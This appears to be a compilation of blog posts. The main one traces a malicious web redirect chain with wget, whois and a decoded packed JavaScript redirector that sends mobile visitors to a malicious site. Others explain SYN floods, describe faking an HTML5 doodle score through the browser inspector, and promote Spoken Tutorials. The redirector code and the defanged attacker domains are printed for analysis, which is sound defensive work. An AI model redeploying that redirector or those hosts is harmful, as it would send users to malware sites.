How to handle the redirection from malicious websites..!!


The journey starts with a link to a website.

The link pointed me to a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL looks like a normal one if you ignore the .ru part 🙂

When I opened it in my browser, it redirected me to

So I used wget to download the file instead.

After downloading the file I opened it in the browser and got the same redirection again. Grrr..

Let's look at the response headers:

HTTP/1.1 200 OK
 Server: nginx/0.8.54
 Date: Thu, 16 May 2013 14:26:15 GMT
 Content-Type: text/html
 Connection: keep-alive
 Last-Modified: Thu, 16 May 2013 14:03:59 GMT
 ETag: "6bc8011-2e9-4dcd6567d31c0"
 Accept-Ranges: bytes
 Content-Length: 745

OK, so the website is not down; it is redirecting. Since we have the code, let's look at the part that redirects us.

<title>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious: an unterminated script comment followed by a stray </noscript> is tag soup, but the browser still honours the meta refresh, which is the redirect we kept hitting. Let's see what VirusTotal says about this website.


The first two are the URLs I started with, and the other one is for

So they redirect on every web page, which means I have to download everything with wget and then analyze it: no GUI, only code 😦

Two different analyses anyway; the good thing is that it still shows that it is malicious 🙂

After downloading the second file I analysed it and found that it includes two JavaScript files.

So I downloaded those two files as well; the references were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>
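To make this triage step repeatable, here is an added example (my code, not the author's) that does statically what the post does by eye: it scans the saved HTML text for the three redirect mechanisms seen on this page (a meta refresh, external script includes and an inline location.href assignment), resolves relative paths against the page URL and defangs the results the way the post does. Nothing is rendered or executed. The sample HTML is constructed, modelled on the Wallmart.html page quoted above, with example.* hostnames in place of the real ones.

```javascript
'use strict';
// Static triage of a fetched page: find where it would send the browser next.

// Defang an absolute URL for notes and reports (the post's h00p / [dot] convention).
function defang(abs) {
  try {
    const u = new URL(abs);
    return `${u.protocol.replace(/^http/, 'h00p')}//${u.host.replace(/\./g, '[dot]')}${u.pathname}${u.search}`;
  } catch {
    return abs;                       // not parseable as a URL: leave it as found
  }
}

// Resolve a possibly-relative reference (e.g. /media/system/js/core.js) against the page URL.
function resolve(ref, baseUrl) {
  try { return new URL(ref, baseUrl).href; } catch { return ref; }
}

// Pull redirect mechanisms and external scripts out of raw HTML.
function triage(html, baseUrl) {
  const findings = [];
  // 1. <meta http-equiv="refresh" content="0; url=...">  (quotes optional, case-insensitive)
  const metaRe = /<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']([^"']*)["']/gi;
  for (const m of html.matchAll(metaRe)) {
    const urlMatch = /url\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    if (urlMatch) findings.push({ kind: 'meta-refresh', target: resolve(urlMatch[1], baseUrl) });
  }
  // 2. <script src="..."> includes, the second hop in the post
  const scriptRe = /<script[^>]+src\s*=\s*["']?([^"'\s>]+)/gi;
  for (const m of html.matchAll(scriptRe)) {
    findings.push({ kind: 'script-src', target: resolve(m[1], baseUrl) });
  }
  // 3. Inline JavaScript redirects: location.href = "...", window.location = "..."
  const jsRe = /(?:location(?:\.href)?|window\.location)\s*=\s*["']([^"']+)["']/gi;
  for (const m of html.matchAll(jsRe)) {
    findings.push({ kind: 'js-redirect', target: resolve(m[1], baseUrl) });
  }
  return findings.map((f) => ({ ...f, target: defang(f.target) }));
}

// Constructed sample modelled on the redirect page quoted above. The tag soup
// (<script><!-- ... </noscript>) hides the refresh from a casual read, not from a scan.
const SAMPLE_HTML = `<title>Wallmart is loading...</title>
<script type="text/javascript"><!--
<meta http-equiv="refresh" content="0; url=http://example.org/news/ask-index.php"></noscript>
<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>
<script>if(/mobile/i.test(navigator.userAgent)){document.location.href="http://example.com/search.php?sid=1"}</script>`;
const SAMPLE_BASE = 'http://example.net/Wallmart.html';

function triageSample() {
  return triage(SAMPLE_HTML, SAMPLE_BASE);
}

console.log(triageSample());
```

Run it over each file wget saved (fed the page's real URL as the base) and you get the hop list without ever loading the page in a browser; the regexes are deliberately loose about quoting and case because malicious pages rarely produce tidy HTML.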

Time to analyze these two files. The VirusTotal reports are

For core.js

For caption.js

Indeed they are malicious.

Time to take a look inside these two.


The malicious code is common to both files.

After decoding it, what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Which finally redirects you to


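The eval(function(p,a,c,k,e,r){...}) wrapper above is Dean Edwards' "packer". Its decoder is nothing more than a dictionary substitution, so it can be reversed without ever evaluating the payload. Below is an added example (my code, not from the post) that re-implements that substitution statically and runs it on the p, a, c and k arguments copied from the script above, with the URL kept in its defanged form. The decoded result is the mobile user-agent check and the location.href assignment that sends phones to online2you.

```javascript
'use strict';
// Static decoder for Dean Edwards' "packer" output:
//   eval(function(p,a,c,k,e,r){...}('packed', 62, 122, 'dict|...'.split('|'), 0, {}))
// The decoder's substitution pass is re-implemented here instead of calling eval,
// so the malicious payload is recovered as text and never executed.

function unpackPacker(p, a, c, k) {
  if (k.length !== c) throw new Error(`dictionary has ${k.length} words, expected ${c}`);
  // encode(n): the packer's base-`a` token for dictionary index n
  // (digits 0-9, then a-z, then A-Z when a is 62).
  const encode = (n) => {
    const prefix = n < a ? '' : encode(Math.floor(n / a));
    const d = n % a;
    return prefix + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
  };
  // token -> word; an empty dictionary slot means the token stands for itself.
  const dict = Object.create(null);
  for (let i = 0; i < c; i++) dict[encode(i)] = k[i] || encode(i);
  // One pass over every \w+ token, which is what the loader itself does once its
  // `!''.replace(/^/,String)` feature test passes (it does in every modern engine).
  return p.replace(/\b\w+\b/g, (tok) => (tok in dict ? dict[tok] : tok));
}

// The (p, a, c, k) arguments copied from the decoded script above; the URL stays defanged.
const PACKED_P = '7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}';
const PACKED_A = 62;
const PACKED_C = 122;
const PACKED_K = 'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|');

// Decode the redirector to plain JavaScript source.
function decodeRedirector() {
  return unpackPacker(PACKED_P, PACKED_A, PACKED_C, PACKED_K);
}

// Read the redirect target out of the decoded source, still without executing it.
function redirectTarget(js) {
  const m = /document\.location\.href\s*=\s*["']([^"']+)["']/.exec(js);
  return m ? m[1].trim() : null;
}

console.log(decodeRedirector());
console.log('mobile visitors are sent to:', redirectTarget(decodeRedirector()));
```

The decoded script is `var ismobile=navigator.userAgent.match(/(acs)|(alav)|...|(ipad)|(iphone)/i);if(ismobile){document.location.href="h00p://online2you[dot]org/search.php?sid=1"}`: a stock mobile-browser regex, so only phone and tablet visitors get the third hop while a desktop analyst sees nothing happen. That is one reason for fetching pages with wget (or curl with a spoofed mobile User-Agent) rather than a desktop browser.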
The next task was to get the payload, as this was most probably the site where they had hidden the treasure.

But unfortunately it was down: error 404.

 Connecting to||:80... connected.
 HTTP request sent, awaiting response... 404 Not Found
 2013-05-18 17:44:43 ERROR 404: Not Found.

I thought that since there is redirection everywhere, this might depend on the client's location, so I tried it through proxies in the US, Russia and 3-4 other countries, but got the same result every time.

Is it just me, or is everyone else unable to download the contents from this site too?

OK, let's see the whois for the website.

whois for  h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you:

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information:

And finally a snapshot of all the files I gathered:

This was my journey, and this was the end.

Your inputs / criticism are welcome.



What is DDoS at layer 7 and layer 4, and low-rate DDoS?


Very recently some hacktivists called LulzSec and Anonymous became very famous because they hacked a number of government websites and took their data.

This got me interested in how they do all this. As this is now pretty old you probably know about DDoS already, but here I am telling you about DDoS at layers 3 and 4 as well.

The attacks carried out by the hacktivists were layer 7 attacks, and the simplest way to do that kind of attack is to keep pressing the refresh button in your browser.

If hundreds of thousands of people do this, then at some point the server becomes unresponsive and stops serving users.

But for this kind of DDoS we need a great many computers; some of their owners may know they are part of the attack, and sometimes people get involved unknowingly because their machines are infected with malware.

So what are layer 3 and layer 4 DDoS?

As Anonymous became active, one person became active against them under the name "th3j35tor", who claimed to be ex-security personnel.

It was the first time I came across this level of DDoS: he was executing it through a 3G connection on a cellphone and taking down some 3-4 big servers using just one connection.

So what exactly is a layer 4 attack?

A layer 4 DoS attack is often referred to as a SYN flood. It works at the transport layer, i.e. the Transmission Control Protocol (TCP). A TCP connection is established in what is known as a 3-way handshake. The client sends a SYN packet, the server responds with a SYN-ACK, and the client responds to that with an ACK. After the "three-way handshake" is complete, the TCP connection is considered established. It is at this point that applications begin sending data using a layer 7 or application-layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN-ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of half-open and concurrent TCP connections they can hold, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the "endpoint" of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

The attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies encode the connection state in the server's initial sequence number using a cryptographic hash, so the server keeps no half-open state until the client's ACK proves the handshake is genuine. The hashing costs CPU, which makes it desirable to let a proxy/delivery solution with hardware-accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server offsets much of the gain achieved by preventing SYN floods and often results in available, but unacceptably slow, servers and sites.

LDoS (I have limited knowledge of this, which I am sharing; if you have something more, do share it with me). The description below is taken from the abstract of a research paper on the subject, hence the "in this paper":

Low-rate Distributed Denial-of-Service (LDDoS) attacks send fewer packets to attack legitimate flows by exploiting the vulnerability in TCP's congestion control mechanism.

They are difficult to detect while causing severe damage to TCP-based applications. Existing approaches can only detect the presence of an LDDoS attack, but fail to identify LDDoS flows. In this paper, we propose a novel metric – Congestion Participation Rate (CPR) – and a CPR-based approach to detect and filter LDDoS attacks by their intention to congest the network. The major innovation of the CPR-based approach is its ability to identify LDDoS flows.

A flow with a CPR higher than a predefined threshold is classified as an LDDoS flow, and consequently all of its packets will be dropped. We analyze the effectiveness of CPR theoretically by quantifying the average CPR difference between normal TCP flows and LDDoS flows and showing that CPR can differentiate them. We conduct ns-2 simulations, test-bed experiments, and Internet traffic trace analysis to validate our analytical results and evaluate the performance of the proposed approach. Experimental results demonstrate that the proposed CPR-based approach is substantially more effective compared to an existing Discrete Fourier Transform (DFT)-based approach.


My project for protection against layer 7 DDoS attacks.

I have created this DDoS protection script, which is under the GPL license and is useful for protecting a server from layer 7 DDoS.

It is useless against layer 3 and layer 4 DDoS attacks, and a lot of code still needs to be completed, which I will do when I get some free time. If you feel like completing it then please go ahead and ask me whatever you want.

The script can be downloaded from here; I will put it on Git ASAP.

I am sorry the previous link was not working, so I have uploaded it to Git now and you can get it from here; it's under the GPL license so you can use it for free 🙂

Hope you like this and do share your views.


HTML 5 and security


Gaming is not just a mere time pass; it's something much more than that.
Now people compete in gaming and there are prizes to be won; people spend money on games to keep their score above others', and there are gamers so dedicated that they play almost 24×7.
Working as an HTML5 game developer with Mintango Technologies, and a security guy by passion, I came up with this. It is something very common, but still worth sharing.

I believe almost all of you know about Google's recent Olympic special doodles, and some of us are more interested in getting a good score, getting all those 3 medals, and then taking a screenshot and posting it on Facebook.

If you see a friend's good score, that doesn't necessarily mean the person really scored that, because if you know a little HTML it is very easy to fake your score. I am talking about manipulating the score, not Photoshop.

It's very simple: just right-click on the doodle and click Inspect Element (I did this in Google Chrome), which takes you to the HTML code. Now simply search for the number that represents your score and change it to whatever you want it to be.



Change the value from 20 to 999, and this will look like

Image before changing anything

And now the medals: change the class from class="hplogo_smh" to class="hplogo_smg"
and tada, you've got one of the best scores.

Why am I telling this story?

Don't you think it's very easy? Indeed it is. But the question is: if it is that easy, is it worth creating serious games using HTML5?
I am not a (superhero :P) Flash guy, but I know that it is secure enough that serious games can be created with it; companies like Zapak and some others create games which record the final score and then distribute prizes, which attracts gamers to log on to their site.

I am not saying that it has to be like a castle, but we need this to be secure, as anyone can easily manipulate the score or the content we send to the server, which is used for the analysis of our score and comparison of players.
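The point above generalises: anything the browser sends about a score can be edited just like the DOM can, so a server that hands out prizes cannot use the score it is sent. Here is an added example (my code, not the author's, and not tied to any real game) of the usual fix: the server issues the seed for a round, the client sends back only its inputs, and the server replays the round and computes the score itself. The game (tap the target cell on a 5x5 grid for 20 beats) and the PRNG are constructed for the demo.

```javascript
'use strict';
// Server-authoritative scoring: the client's inputs are replayed, its claimed score ignored.

// Small deterministic PRNG (mulberry32) so server and client derive the same targets.
function mulberry32(seed) {
  let a = seed >>> 0;
  return () => {
    a = (a + 0x6D2B79F5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

const ROUND_LENGTH = 20;      // beats (targets) per round
const CELLS = 25;             // targets appear on a 5x5 grid, numbered 0..24

// The target cell for each beat of the round, derived only from the seed.
function targetsFor(seed) {
  const rnd = mulberry32(seed);
  return Array.from({ length: ROUND_LENGTH }, () => Math.floor(rnd() * CELLS));
}

// Replay the client's taps against the real targets. Malformed input is rejected outright.
function scoreRound(seed, taps) {
  if (!Array.isArray(taps) || taps.length > ROUND_LENGTH) return { ok: false, reason: 'bad input' };
  const targets = targetsFor(seed);
  let score = 0;
  for (let i = 0; i < taps.length; i++) {
    if (!Number.isInteger(taps[i]) || taps[i] < 0 || taps[i] >= CELLS) return { ok: false, reason: 'bad input' };
    if (taps[i] === targets[i]) score++;
  }
  return { ok: true, score };
}

// Submission handler. `session` is the server's own record of the round it issued:
// the seed is server-chosen and each session is scored once, so a re-seeded or
// replayed submission is refused. The client's claimed score is kept only for logging.
function handleSubmission(session, submission) {
  if (submission.seed !== session.seed) return { accepted: false, reason: 'seed mismatch' };
  if (session.used) return { accepted: false, reason: 'replay' };
  const result = scoreRound(session.seed, submission.taps);
  if (!result.ok) return { accepted: false, reason: result.reason };
  session.used = true;
  return { accepted: true, score: result.score, claimed: submission.score };
}

// Constructed round: an honest player hits the first 12 targets and misses the rest;
// a cheater sends the same taps but a DOM-edited score of 999.
function demo() {
  const seed = 0xC0FFEE;
  const targets = targetsFor(seed);
  const taps = targets.map((t, i) => (i < 12 ? t : (t + 1) % CELLS));
  const honest = handleSubmission({ seed, used: false }, { seed, taps, score: 12 });
  const cheat = handleSubmission({ seed, used: false }, { seed, taps, score: 999 });
  return { honest, cheat };
}

console.log(demo());   // both score 12; the 999 is recorded as "claimed" and nothing more
```

This does not stop a bot that plays the game perfectly (that needs rate limits and plausibility checks on timing), but it removes the attack in the post entirely: editing the page changes what the player sees, not what the server counts.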

I must confess that I never tried this on some big game, as for that I would need official permission from the server owner. If you have one, I would love to test it 🙂

I will come up with how to make things more secure and what changes we need to make serious gaming more serious.


It's not that secure yet.

If you have any questions then you may mail me or comment here.

Spoken tutorials!!

A place where you may learn most of the open-source technologies, software and languages too, where language is not a barrier. 🙂
Hey all, this is my second post and I am going to tell you about something great which you should know: Spoken Tutorials 🙂
Have you ever heard about it?
It's a project through which you may earn and learn simultaneously.
It's a project of the National Mission on Education through Information and Communication Technology (NMEICT), launched by MHRD, Govt of India.
It is run by IIT Bombay (IITB), and they organize their workshops throughout the country.
On 2-3 October 2010 Prof. Kannan Moudgalya was in Jaipur with his team, where I met him and worked with him for 2 days, and found Spoken Tutorials to be very interesting. There is a lot in it for everyone, and the biggest thing is that it's all about FOSS 😉
They are accepting tutorials on any FOSS technology or software; every tutorial is just 10 minutes long, and they pay about 2.5K for every 10-minute tutorial 🙂
The biggest thing is that they are not specific to any one language, i.e. English or Hindi; they accept tutorials in all the major languages of India, which means language is no longer a barrier to learning something.
If you think you could dub some tutorial into your native language where it is not yet available, then go ahead; they pay for that too.
All the videos are FREE to watch if you just want to learn from them.
C00l!! B-)
Now you are wondering how to create a tutorial, or how to dub one???
It's not really a big deal: just navigate to the website and you will find video tutorials even on these things.

Campus Ambassador
There is a program for students to become campus ambassadors. As a campus ambassador you are the one who promotes Spoken Tutorials in your campus, and it looks good in your CV too 🙂
The campus ambassador link is here
and if you want to apply to be a campus ambassador then hit me up.
What am I contributing?
I am working on submitting Nmap tutorials here.
So if you want to learn how to use Nmap and its other features then just go to this website and watch them 🙂
These tutorials are not completed yet; I will post the link as soon as they are. 🙂
Wiki main page
Brochures are available over here

So, go and enjoy: happy learning and earning.